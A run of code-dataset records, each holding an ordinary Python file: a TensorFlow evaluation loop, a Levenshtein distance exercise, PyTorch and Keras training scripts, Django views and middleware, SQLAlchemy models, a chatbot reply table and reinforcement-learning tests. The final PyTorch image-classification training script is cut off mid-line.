FLAGS.checkpoint_path\n\t\t\ttf.logging.info('Evaluating %s' % checkpoint_path)\n\n\t\t\t# Waiting loop.\n\t\t\tslim.evaluation.evaluation_loop(\n\t\t\t\tmaster=FLAGS.master,\n\t\t\t\tcheckpoint_dir=checkpoint_path,\n\t\t\t\tlogdir=FLAGS.eval_dir,\n\t\t\t\tnum_evals=num_batches,\n\t\t\t\teval_op=list(names_to_updates.values()),\n\t\t\t\tvariables_to_restore=variables_to_restore,\n\t\t\t\teval_interval_secs=60,\n\t\t\t\tmax_number_of_evaluations=np.inf,\n\t\t\t\tsession_config=config,\n\t\t\t\ttimeout=None)\n\n\nif __name__ == '__main__':\n\ttf.app.run()\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":10484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"115769343","text":"import numpy as np\n\n\ndef lev (str_x, str_y):\n len_x = len(str_x) + 1\n len_y = len(str_y) + 1\n m = np.zeros((len_x, len_y))\n\n for x in range(len_x):\n m[x, 0] = x\n for y in range(len_y):\n m[0, y] = y\n # print(m)\n\n for x in range(1, len_x):\n for y in range(1, len_y):\n if str_x[x - 1] == str_y[y - 1]:\n m[x, y] = min(\n m[x, y - 1] + 1,\n m[x - 1, y - 1],\n m[x -1, y] + 1,\n )\n else:\n m[x, y] = min(\n m[x, y - 1] + 1,\n m[x - 1, y - 1] + 1,\n m[x - 1, y] + 1,\n )\n # print(m)\n return m[len_x - 1, len_y -1]\n\n\n\n# assert lev(\"Food\", \"Fool\") == 1\n# assert lev(\"Fool\", \"Feel\") == 2\n#\nprint(f\"lev('food, 'feed') = {lev('food', 'feed')}\")\nprint(f\"lev('food, 'fool') = {lev('food', 'fool')}\")\nprint(f\"lev('food, 'food') = {lev('food', 'food')}\")\nprint(f\"lev('food, 'foodstuff') = {lev('food', 'foodstuff')}\")\nprint(f\"lev('foodstuff, 'food') = {lev('foodstuff', 'food')}\")","sub_path":"practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"571093778","text":"##################\n# IMPORT MODULES #\n##################\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\nfrom utils.average_meter import AverageMeter\nfrom utils.metrics import metrics_dict\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n#################\n# TRAINER CLASS #\n#################\nclass Trainer:\n '''\n trn_function train the model for one epoch\n eval_function evaluate the current model on validation data and output current loss and other evaluation metric\n '''\n def __init__(self, model, optimizer, device, criterion):\n self.model = model\n self.optimizer = optimizer\n self.device = device\n self.criterion = criterion\n #################\n # TRAINING STEP #\n #################\n def training_step(self, data_loader):\n # LOSS AVERAGE\n losses = AverageMeter()\n # MODEL TO TRAIN MODE\n self.model.train()\n # TRAINING LOOP\n tk0 = tqdm(data_loader, total=len(data_loader))\n for _, data in enumerate(tk0):\n # LOADING IMAGES & LABELS\n ids = data[\"ids\"]\n masks = data[\"masks\"]\n labels = data[\"labels\"]\n ids = ids.to(self.device)\n masks = masks.to(self.device)\n labels = labels.to(self.device)\n # RESET GRADIENTS\n self.model.zero_grad()\n # CALCULATE LOSS\n output = self.model(ids, masks)\n loss = self.criterion(output, labels)\n # CALCULATE GRADIENTS\n loss.backward()\n self.optimizer.step()\n # UPDATE LOSS\n losses.update(loss.item(), ids.size(0))\n tk0.set_postfix(loss=losses.avg)\n ###################\n # VALIDATION STEP #\n ###################\n def eval_step(self, data_loader, metric, n_class):\n # LOSS & METRIC AVERAGE\n losses = AverageMeter()\n metrics_avg = AverageMeter()\n # MODEL TO EVAL MODE\n self.model.eval()\n # VALIDATION LOOP\n with torch.no_grad():\n tk0 = tqdm(data_loader, total=len(data_loader))\n for _, data in enumerate(tk0):\n # LOADING IMAGES & LABELS\n ids = data[\"ids\"]\n masks = data[\"masks\"]\n labels = data[\"labels\"]\n ids = ids.to(self.device)\n masks = masks.to(self.device)\n labels = labels.to(self.device)\n # CALCULATE LOSS & METRICS\n output = self.model(ids, masks)\n loss = self.criterion(output, labels)\n\n metric_used = metrics_dict[metric]\n predictions = torch.softmax(output, dim=1)\n _, predictions = torch.max(predictions, dim=1)\n\n metric_value = metric_used(labels, predictions, n_class)\n\n losses.update(loss.item(), ids.size(0))\n metrics_avg.update(metric_value.item(), ids.size(0))\n\n tk0.set_postfix(loss=losses.avg)\n print(f\"Validation Loss = {losses.avg}\")\n return loss, metrics_avg.avg\n","sub_path":"trainer/train_fct.py","file_name":"train_fct.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"550510680","text":"# -*- coding: utf-8 -*-\n# 引入模块\nfrom django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom .models import Article\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\n\n# 数据展示页面\ndef queryAll(request):\n b=Article.objects.all()\n return render_to_response('zsgc/queryall.html',{'data':b})\n\n# 删除数据方法\ndef delByID(request,cui_id):\n a = cui_id\n bb=Article.objects.get(id=a)\n bb.delete()\n return HttpResponseRedirect(\"/query/\")\n\n# 增加数据页面\ndef addByID(request): \n return render_to_response('zsgc/add.html')\n\n# 增加数据方法\ndef add1(request):\n title=request.POST['title']\n author=request.POST['author']\n st=Article()\n st.title=title\n st.author=author\n st.save()\n return HttpResponseRedirect(\"/query/\")\n\ndef add2(request):\n id=request.POST['id']\n title=request.POST['title']\n author=request.POST['author']\n st=Article()\n if len(id) > 0 :\n st.id=id\n st.title=title\n st.author=author\n st.save()\n return HttpResponseRedirect(\"/query/\")\n \n# 更新数据方法\ndef updateByID(request,cui_id):\n i=cui_id\n b=Article.objects.get(id=i)\n return render_to_response('zsgc/update.html',{'data':b})\n\n# 数据查询页面\ndef search1(request):\n return render_to_response('zsgc/search1.html')\n\n# 查询结构页面\ndef search2(request):\n q = request.GET['q']\n books = Article.objects.filter(title__icontains=q)\n return render_to_response('zsgc/search2.html',{'books': books})\n\n\n\n\n\n\n","sub_path":"zsgc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"473835988","text":"import time\r\nimport logging\r\n\r\nfrom imoocdjango import settings\r\n\r\nlogger = logging.getLogger('statistics')\r\nlogger2 = logging.getLogger('django')\r\n\r\n\r\nclass StatisticsMiddleware:\r\n def __init__(self, get_response):\r\n self.get_response = get_response\r\n logger2.info('Build StatisticsMiddleware')\r\n\r\n def __call__(self, request):\r\n tick = time.time()\r\n response = self.get_response(request)\r\n path = request.path\r\n full_path = request.get_full_path()\r\n tock = time.time()\r\n cost = tock - tick\r\n content_list = []\r\n content_list.append('now=[%d]' % tock)\r\n content_list.append('path=[%s]' % path)\r\n content_list.append('full_path=[%s]' % full_path)\r\n content_list.append('cost=[%.6f]' % cost)\r\n content = settings.STATISTICS_SPLIT_FLAG.join(content_list)\r\n logger.info(content)\r\n\r\n return response\r\n\r\n","sub_path":"module/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"410505846","text":"\nfrom dcicutils.ff_utils import (\n search_metadata,\n)\nfrom tibanna import create_logger\n\n\nlogger = create_logger(__name__)\n\n\nclass FormatExtensionMap(object):\n def __init__(self, ff_keys=None, ffe_all=None):\n \"\"\"connect to the server and get all fileformat search result if ff_keys\n if given. If not, use user-specified ffe_all\n \"\"\"\n if not ff_keys and not ffe_all:\n raise Exception(\"Either ff_keys or ffe_all must be specified\" + \\\n \"to create a FormatExtensionMap object\")\n if ff_keys and ffe_all:\n raise Exception(\"Either ff_keys or ffe_all must be specified but not both\" + \\\n \"to create a FormatExtensionMap object\")\n if ff_keys and not ffe_all:\n try:\n logger.debug(\"Searching in server : \" + ff_keys['server'])\n ffe_all = search_metadata(\"/search/?type=FileFormat&frame=object\", key=ff_keys)\n except Exception as e:\n raise Exception(\"Can't get the list of FileFormat objects. %s\\n\" % e)\n self.fe_dict = dict()\n logger.debug(\"**ffe_all = \" + str(ffe_all))\n for k in ffe_all:\n file_format = k['file_format']\n self.fe_dict[file_format] = \\\n {'standard_extension': k['standard_file_extension'],\n 'other_allowed_extensions': k.get('other_allowed_extensions', []),\n 'extrafile_formats': k.get('extrafile_formats', [])\n }\n\n def get_extension(self, file_format):\n if file_format in self.fe_dict:\n return self.fe_dict[file_format]['standard_extension']\n else:\n return None\n\n def get_other_extensions(self, file_format):\n if file_format in self.fe_dict:\n return self.fe_dict[file_format]['other_allowed_extensions']\n else:\n return []\n\n\ndef parse_formatstr(file_format_str):\n if not file_format_str:\n return None\n return file_format_str.replace('/file-formats/', '').replace('/', '')\n\n\ndef cmp_fileformat(format1, format2):\n return parse_formatstr(format1) == parse_formatstr(format2)\n","sub_path":"tibanna_ffcommon/file_format.py","file_name":"file_format.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"125811113","text":"# -*- coding: utf-8 -*-\n\nLOGIC_RESPONSES = {\n \"thank\": [\n \"Of course!\",\n \"Anytime!\",\n \"You're welcome\",\n \"You are so welcome!\"\n ],\n \"thanks\": [\n \"Of course!\",\n \"Anytime!\",\n \"You're welcome\",\n \"You are so welcome!\"\n ],\n 'hey':[\n 'Hi'\n ],\n 'hello':[\n 'Hello'\n ],\n 'salam':[\n 'Salam',\n ],\n u'السلام عليكم':[\n 'وعليكم السلام ورحمة الله وبركاته'\n ],\n u'مساعدة':[\n u'أكتب الكلمة التي تريد البحث عنها وسيرد الروبوت بنتائجها'\n ],\n u'ساعدني':[\n u'أكتب الكلمة التي تريد البحث عنها وسيرد الروبوت بنتائجها'\n ],\n 'menu':[\n 'No menu for now',\n ],\n 'help': [\n u\"\"\"\nExact search:\tفأسقيناكموه\nPhrase search:\t\"رب العالمين\"\nLogical relations: سميع | بصير\nWildcards:\t*نبي*\nFields:\tسورة:يس\nIntervals:\tرقم_السورة:[1 الى 5]\nPartial vocalization:\tآية_:'المَلكُ'\nWord properties:\t{قول،اسم}\nDerivations: >ملك\nBuckwalter Transliteration: qawol\n \"\"\",\n ],\n 'code': [\n \"Have you considered looking at our code on https://github.com/assem-ch/quran-messenger-bot\",\n ],\n}","sub_path":"bot/logic_constants.py","file_name":"logic_constants.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"507077229","text":"\"\"\" Nicholas Molica and Joshua Kwok\nAudio processing methodology inspired by Leland Roberts' genre classification project, which can be read about here:\nhttps://towardsdatascience.com/musical-genre-classification-with-convolutional-neural-networks-ff04f9601a74\n\"\"\"\n\nimport os\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom numpy import asarray\nfrom numpy import delete\nfrom tensorflow import keras\nfrom tensorflow.python.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D, AveragePooling2D\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.keras.layers.pooling import AveragePooling2D\n\n# get train/test data folders from user and verify that they are indeed folders\nprint(\"Source folder for training data:\")\ntrain_src = input()\nprint(\"Source folder for test data:\")\ntest_src = input()\nif not os.path.isdir(train_src) or not os.path.isdir(test_src):\n print(\"Invalid source folder(s).\")\n exit(1)\n\n# a mapping of artist names to numerical labels\nlabel_dict = {\n 'chetbaker': 0,\n 'billevans': 1,\n 'johncoltrane': 2,\n 'mccoytyner': 3,\n 'bach': 4,\n 'mumfordandsons': 5,\n 'gregoryalanisakov': 6,\n 'mandolinorange': 7,\n 'thesteeldrivers': 8,\n 'bts': 9,\n 'chopin': 10,\n 'mamamoo': 11,\n 'mozart': 12,\n 'seventeen': 13,\n 'tchaikovsky': 14\n}\n\n# given a file name from the data, return the name of the artist (requires that filenames be formatted correctly)\ndef get_text_label(file_name):\n segment_and_artist = file_name.split(\"_\")[0]\n if segment_and_artist[1:] in label_dict:\n artist = segment_and_artist[1:]\n elif segment_and_artist[2:] in label_dict:\n artist = segment_and_artist[2:]\n elif segment_and_artist[3:] in label_dict:\n artist = segment_and_artist[3:]\n else:\n print(\"Invalid file name scheme.\")\n exit(1)\n\n return artist\n\n# collect training data and corresponding labels\ntrain_data = {'data': [], 'label': []}\nfor file in os.listdir(train_src):\n if file[-4:] != '.png':\n continue\n img = Image.open(train_src + \"/\" + file)\n label = get_text_label(file)\n arr = asarray(img)\n arr = delete(arr, 1, 2)\n train_data['data'].append(arr)\n train_data['label'].append(label)\n\n# collect testing data and corresponding labels\ntest_data = {'data': [], 'label': []}\nfor file in os.listdir(test_src):\n if file[-4:] != '.png':\n continue\n img = Image.open(test_src + \"/\" + file)\n label = get_text_label(file)\n arr = asarray(img)\n arr = delete(arr, 1, 2)\n test_data['data'].append(arr)\n test_data['label'].append(label)\n\n# cast everything to numpy arrays to prep for training\nfeatures_train = asarray(train_data['data'])\nlabels_train = asarray(list(map(lambda x: label_dict[x], train_data['label'])))\nfeatures_test = asarray(test_data['data'])\nlabels_test = asarray(list(map(lambda x: label_dict[x], test_data['label'])))\n\n# normalize data to be between 0 and 1 and convert to binary class matrix\nfeatures_train = features_train.astype('float32') / 255\nfeatures_test = features_test.astype('float32') / 255\nlabels_train = keras.utils.to_categorical(labels_train, 15)\nlabels_test = keras.utils.to_categorical(labels_test, 15)\n\n\"\"\"\nThe CNN code below was originally adapted from Leland Roberts' genre classification project.\nTheir full project is available on their Github (github.com/lelandroberts97), but the specific code we adapted is available here:\nhttps://github.com/lelandroberts97/Musical_Genre_Classification/blob/master/code/04_CNN.ipynb\n\"\"\"\n\n# initialize the model as a Sequential neural network\ncnn_model = keras.Sequential(name='cnn')\n\n# add the first convolutional layer and corresponding max pooling layer\ncnn_model.add(Conv2D(filters=16,\n kernel_size=(3,3),\n activation='relu',\n input_shape=(54,773,1)))\ncnn_model.add(MaxPooling2D(pool_size=(2,4)))\n\n# add a second convolutional layer and an average pooling layer\ncnn_model.add(Conv2D(filters=32,\n kernel_size=(3,3),\n activation='relu'))\ncnn_model.add(AveragePooling2D(pool_size=(2,4)))\n\n# add a flattening layer to flatten convolutions before passing through neurons\ncnn_model.add(Flatten())\n\n# add a densely connected hidden layer of 64 neurons (w/ relu activation functions)\ncnn_model.add(Dense(64, activation='relu'))\n\n# add a dropout layer to help combat overfitting\ncnn_model.add(Dropout(0.25))\n\n# add a densely connected output layer (w/ softmax activation functions)\ncnn_model.add(Dense(15, activation='softmax'))\n\n# compile the network\ncnn_model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n# fit the network to the data, validate at each step to show testing accuracy after each epoch\nhistory = cnn_model.fit(features_train,\n labels_train, \n batch_size=32,\n validation_data=(features_test, labels_test),\n epochs=40)\n\n# collect the training/testing accuracy and plot it\ntrain_accuracy = history.history['train_accuracy']\ntest_accuracy = history.history['test_accuracy']\nplt.figure(figsize = (16,8))\nplt.plot(train_accuracy, label='Training Accuracy', color='blue')\nplt.plot(test_accuracy, label='Testing Accuracy', color='red')\nplt.title('Training and Testing Accuracy by Epoch', fontsize = 25)\nplt.xlabel('Epoch', fontsize = 18)\nplt.ylabel('Accuracy', fontsize = 18)\nplt.xticks(range(1,40), range(1,40))\nplt.savefig(\"results.png\", bbox_inches='tight', pad_inches=0.2)\nplt.close()\n\n# evaluate the final test accuracy and print it\nscore = cnn_model.evaluate(features_test, labels_test)\nprint(\"Test accuracy: \", score[1])","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251613301","text":"import os\nfrom sqlalchemy import Column, Integer, Float, DateTime, String, ForeignKey, create_engine\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\nimport sys\nimport json\n\n\ndatabase_path = os.environ['DATABASE_URL']\n\ndb = SQLAlchemy()\n\n\ndef setup_db(app, database_path=database_path):\n app.config['SQLALCHEMY_DATABASE_URI'] = database_path\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.app = app\n db.init_app(app)\n db.create_all()\n\n\nclass Project(db.Model):\n __tablename__ = 'project'\n id = Column(Integer, primary_key=True)\n name = Column(String, nullable=False)\n kind = Column(String, nullable=True)\n deadline = Column(DateTime, default=datetime.utcnow, nullable=True)\n word_count = Column(Integer, default=0, nullable=True)\n hour_count = Column(Float, default=0.0, nullable=True)\n rate = Column(Float, default=0.0, nullable=True)\n person_id = Column(Integer, ForeignKey('person.id'), nullable=False)\n service_id = Column(Integer, ForeignKey('service.id'), nullable=False)\n person_child = db.relationship(\"Person\", back_populates='services')\n service_child = db.relationship(\"Service\", back_populates='people')\n\n def insert(self):\n try:\n db.session.add(self)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n\n def update(self):\n try:\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n\n def delete(self):\n try:\n db.session.delete(self)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n\n def format(self):\n return{\n 'id': self.id,\n 'name': self.name,\n 'kind': self.kind,\n 'deadline': self.deadline,\n 'word_count': self.word_count,\n 'hour_count': self.hour_count,\n 'rate': self.rate,\n 'person_id': self.person_id,\n 'service_id': self.service_id\n }\n\n\nclass Person(db.Model):\n __tablename__ = 'person'\n\n id = Column(Integer, primary_key=True)\n name = Column(String, nullable=False)\n kind = Column(String, nullable=True)\n email = Column(String, nullable=True)\n ratew = Column(Float, default=0.0, nullable=True)\n rateh = Column(Float, default=0.0, nullable=True)\n services = db.relationship(\"Project\", back_populates=\"person_child\")\n\n def insert(self):\n try:\n db.session.add(self)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n\n def update(self):\n try:\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n\n def delete(self):\n try:\n db.session.delete(self)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n\n def format(self):\n return{\n 'id': self.id,\n 'name': self.name,\n 'kind': self.kind,\n 'email': self.email,\n 'ratew': self.ratew,\n 'rateh': self.rateh\n }\n\n\nclass Service(db.Model):\n __tablename__ = 'service'\n\n id = Column(Integer, primary_key=True)\n name = Column(String, nullable=False)\n source = Column(String, nullable=False)\n destiny = Column(String, nullable=False)\n people = db.relationship(\"Project\", back_populates=\"service_child\")\n\n def insert(self):\n try:\n db.session.add(self)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n\n def update(self):\n try:\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n\n def delete(self):\n try:\n db.session.delete(self)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n\n def format(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'source': self.source,\n 'destiny': self.destiny\n }\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"280106928","text":"__author__ = 'Filipe P. Spindola'\n\nimport requests\n\nclass Questao2:\n def __init__(self):\n self.foo = ['t', 's', 'w', 'l', 'h']\n self.raw_text1 = 'https://raw.github.com/I-Value/ExameIValue/master/textoA.txt'\n self.raw_text2 = 'https://raw.github.com/I-Value/ExameIValue/master/textoB.txt'\n\n def process_text_1(self, text):\n\n verbs = []\n first_person_verbs = []\n text1 = requests.get(text).content.decode().split()\n\n for word in text1:\n if len(word) >= 8 and word[-1:] in self.foo:\n verbs.append(word)\n if word[:1] in self.foo:\n first_person_verbs.append(word)\n return len(verbs), len(first_person_verbs)\n\n def process_text_2(self, text):\n\n verbs = []\n first_person_verbs = []\n text2 = requests.get(text).content.decode().split()\n\n for word in text2:\n if len(word) >= 8 and word[-1:] in self.foo:\n verbs.append(word)\n if word[:1] in self.foo:\n first_person_verbs.append(word)\n return len(verbs), len(first_person_verbs)\n\n\nif __name__ == '__main__':\n cl = Questao2()\n ret_text_1 = cl.process_text_1(cl.raw_text1)\n ret_text_2 = cl.process_text_2(cl.raw_text2)\n print('The first text has {0} verbs and {1} first person verbs'.format(ret_text_1[0], ret_text_1[1]))\n print('The second text has {0} verbs and {1} first person verbs'.format(ret_text_2[0], ret_text_2[1]))\n\n\n\n\n\n\n\n","sub_path":"Questao2.py","file_name":"Questao2.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"135646606","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 11 09:27:16 2018\n\n@author: mlopes\n\"\"\"\n\nimport numpy as np\nimport RL\n\nprint(\"exercicio 1\")\n#exercise 1\n## Env 1\nPl = np.zeros((7,2,7))\nPl[0,0,1]=1\nPl[1,0,2]=1\nPl[2,0,3]=1\nPl[3,0,4]=1\nPl[4,0,5]=1\nPl[5,0,6]=0.9\nPl[5,0,5]=0.1\nPl[6,0,6]=1\nPl[0,1,0]=1\nPl[1,1,1]=0\nPl[1,1,0]=1\nPl[2,1,1]=1\nPl[3,1,2]=1\nPl[4,1,3]=1\nPl[5,1,4]=1\nPl[6,1,5]=1\n\nRl = np.zeros((7,2))\nRl[[0,6],:]=1\nabsorv = np.zeros((7,1))\nabsorv[[0,6]]=1\nfmdp = RL.finiteMDP(7,2,0.9,Pl,Rl,absorv)\n\nJ,traj = fmdp.runPolicy(500,3,poltype = \"exploration\")\ndata = np.load(\"Q1.npz\")\nQr = fmdp.traces2Q(traj)\nresult = np.sqrt(sum(sum((data['Q1']-Qr)**2)))\nif result < 1:\n\tprint(\"Aproximação de Q dentro do previsto. OK\\n\")\nelse:\n\tprint(\"Aproximação de Q fora do previsto. FAILED\\n\")\n\nJ,traj = fmdp.runPolicy(3,3,poltype = \"exploitation\", polpar = Qr)\nresult = np.sqrt(sum(sum((data['traj2']-traj)**2)))\nif result < 1:\n\tprint(\"Trajectória óptima. OK\\n\")\nelse:\n\tprint(\"Trajectória não óptima. FAILED\\n\")\n\n#exercise 2\nprint(\"exercicio 2\")\ndata = np.load(\"traj.npz\")\nfmdp = RL.finiteMDP(8,4,0.9)\nq2 = fmdp.traces2Q(data['traj'])\n\nresult = np.sqrt(sum(sum((data['Q']-q2)**2)))\nif result < 1:\n\tprint(\"Aproximação de Q dentro do previsto. OK\\n\")\nelse:\n\tprint(\"Aproximação de Q fora do previsto. FAILED\\n\")\n","sub_path":"proj/2018-2019/part2/src/mainRL.py","file_name":"mainRL.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"137397306","text":"from __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\n\nimport torchvision\nimport torchvision.transforms as transforms\n\nimport os\nimport argparse\nimport json\n\nfrom models import *\nfrom torch.autograd import Variable\nimport SC_Loss\nimport RankingLoss\nimport visdom\nfrom utils2 import FineTuneModel\n\nparser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')\nparser.add_argument('--lr', default=0.01, type=float, help='learning rate')\nparser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')\nargs = parser.parse_args()\n\nuse_cuda = torch.cuda.is_available()\nbest_acc = 0 # best test accuracy\nstart_epoch = 0 # start from epoch 0 or last checkpoint epoch\n\n# Data\nprint('==> Preparing data..')\ntransform_train = transforms.Compose([\n transforms.Resize(256),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4805, 0.456, 0.4063), (0.229, 0.224, 0.225)),\n])\n\ntransform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4805, 0.456, 0.4063), (0.2675, 0.224, 0.225)),\n])\n# trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)\ntrainset = torchvision.datasets.ImageFolder(root='/root/mounted_device/tong/dataset/CUB_200_2011/train',\n transform=transform_train)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=96, shuffle=True, num_workers=16)\n\n# testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)\ntestset = torchvision.datasets.ImageFolder(root='/root/mounted_device/tong/dataset/CUB_200_2011/val',\n transform=transform_train)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=96, shuffle=False, num_workers=16)\n\n# Model\nprint('==> Building model..')\nnet = torchvision.models.resnet50(pretrained=True)\n# net_features = nn.Sequential(*list(net.children())[:-1])\n# for p in net_features.parameters():\n# p.requires_grad = False\n# net_classifier = nn.Sequential(nn.Linear(2048, 200))\nnet = FineTuneModel(net, 200)\noptimizer = optim.SGD(filter(lambda p: p.requires_grad, net.parameters()), lr=args.lr, momentum=0.9, weight_decay=1e-4)\n# net = VGG('VGG19')\n# net = torch.load('resnet18-5c106cde.pth')\n# net = ResNet18()\n# net = PreActResNet18()\n# net = GoogLeNet()\n# net = DenseNet121()\n# net = ResNeXt29_2x64d()\n# net = MobileNet()\n# net = DPN92()\n# net = ShuffleNetG2()\n# net = SENet18()\n# net = LeNet()\n# net = ResNet152()\n# net = Wide_ResNet(depth=28, widen_factor=10, dropout_rate=0.3, num_classes=100)\n# net = CifarResNeXt(cardinality=8, depth=29, nlabels=100, base_width=64, widen_factor=4)\nif use_cuda:\n net.cuda()\n net = torch.nn.DataParallel(net, device_ids=range(torch.cuda.device_count()))\n # net_features = torch.nn.DataParallel(net_features, device_ids=range(torch.cuda.device_count()))\n # net_classifier = torch.nn.DataParallel(net_classifier, device_ids=range(torch.cuda.device_count()))\n cudnn.benchmark = True\n\n\nif args.resume:\n # Load checkpoint.\n print('==> Resuming from checkpoint..')\n assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'\n checkpoint = torch.load('./checkpoint/ckpt.t7')\n net.load_state_dict(checkpoint['net'])\n best_acc = checkpoint['acc']\n start_epoch = checkpoint['epoch']\n optimizer.load_state_dict(checkpoint['optimizer'])\n\nwith open('target_list.json', 'r') as f:\n target_list = json.load(f)\n# target_list = {'airplane', 'automobile', 'bird', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'}\ncriterion = SC_Loss.SC_Loss(target_list).cuda()\n# distance_matrix = criterion.distance_matrix\n# reco_acc = InclusiveLoss.RankingCorrelation(distance_matrix)\n# criterion = nn.CrossEntropyLoss().cuda()\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=30, gamma=0.1)\n\n\n# Training\ndef train(epoch):\n print('\\nEpoch: %d' % epoch)\n net.train()\n train_loss = 0\n correct = 0\n total = 0\n for batch_idx, (inputs, targets) in enumerate(trainloader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n optimizer.zero_grad()\n inputs, targets = Variable(inputs), Variable(targets)\n # features = net_features(inputs)\n # features = features.view(features.size(0), -1)\n # # c_c.record(features, targets)\n # outputs = net_classifier(features)\n outputs = net(inputs)\n # loss = criterion(outputs, targets, c_c)\n if epoch == 5:\n print('!')\n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n\n train_loss += loss.data[0]\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n # reco_acc.update(outputs, targets)\n # print(reco_acc.output())\n # r_a = reco_acc.output()\n # reco_acc.re_init()\n # c_c.update()\n print(epoch, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'\n % (train_loss, 100. * correct / total, correct, total))\n return 100. * correct / total\n # return r_a\n\n\ndef test(epoch):\n global best_acc\n net.eval()\n test_loss = 0\n correct = 0\n total = 0\n for batch_idx, (inputs, targets) in enumerate(testloader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n inputs, targets = Variable(inputs, volatile=True), Variable(targets)\n # features = net_features(inputs)\n # features = features.view(features.size(0), -1)\n # outputs = net_classifier(features)\n # loss = criterion(outputs, targets, c_c)\n outputs = net(inputs)\n loss = criterion(outputs, targets)\n test_loss += loss.data[0]\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n # reco_acc.update(outputs, targets)\n # print(reco_acc.output())\n # r_a = reco_acc.output()\n # reco_acc.re_init()\n\n print(epoch, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'\n % (test_loss, 100. * correct / total, correct, total))\n\n # Save checkpoint.\n acc = 100. * correct / total\n if acc > best_acc:\n print('Saving..')\n state = {\n 'net': net.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n 'optimizer': optimizer.state_dict()\n }\n if not os.path.isdir('checkpoint'):\n os.mkdir('checkpoint')\n torch.save(state, './checkpoint/ckpt.t7')\n best_acc = acc\n return acc\n # return r_a\n\n\nvis = visdom.Visdom()\nwin = vis.line(X=np.array([0]), Y=np.array([[0, 0]]),\n opts={'legend': ['train', 'test'], 'xlabel': 'epoch', 'ylabel': 'acc'})\n# c_c = InclusiveLoss.ClusterCenters(200, 2048)\n\nfor epoch in range(start_epoch, start_epoch + 300):\n scheduler.step()\n print(optimizer.param_groups[0]['lr'])\n train_r_a = train(epoch)\n test_r_a = test(epoch)\n vis.line(X=np.array([epoch]), Y=np.array([[train_r_a, test_r_a]]),\n opts={'legend': ['train', 'test'], 'xlabel': 'epoch', 'ylabel': 'acc'}, update='append', 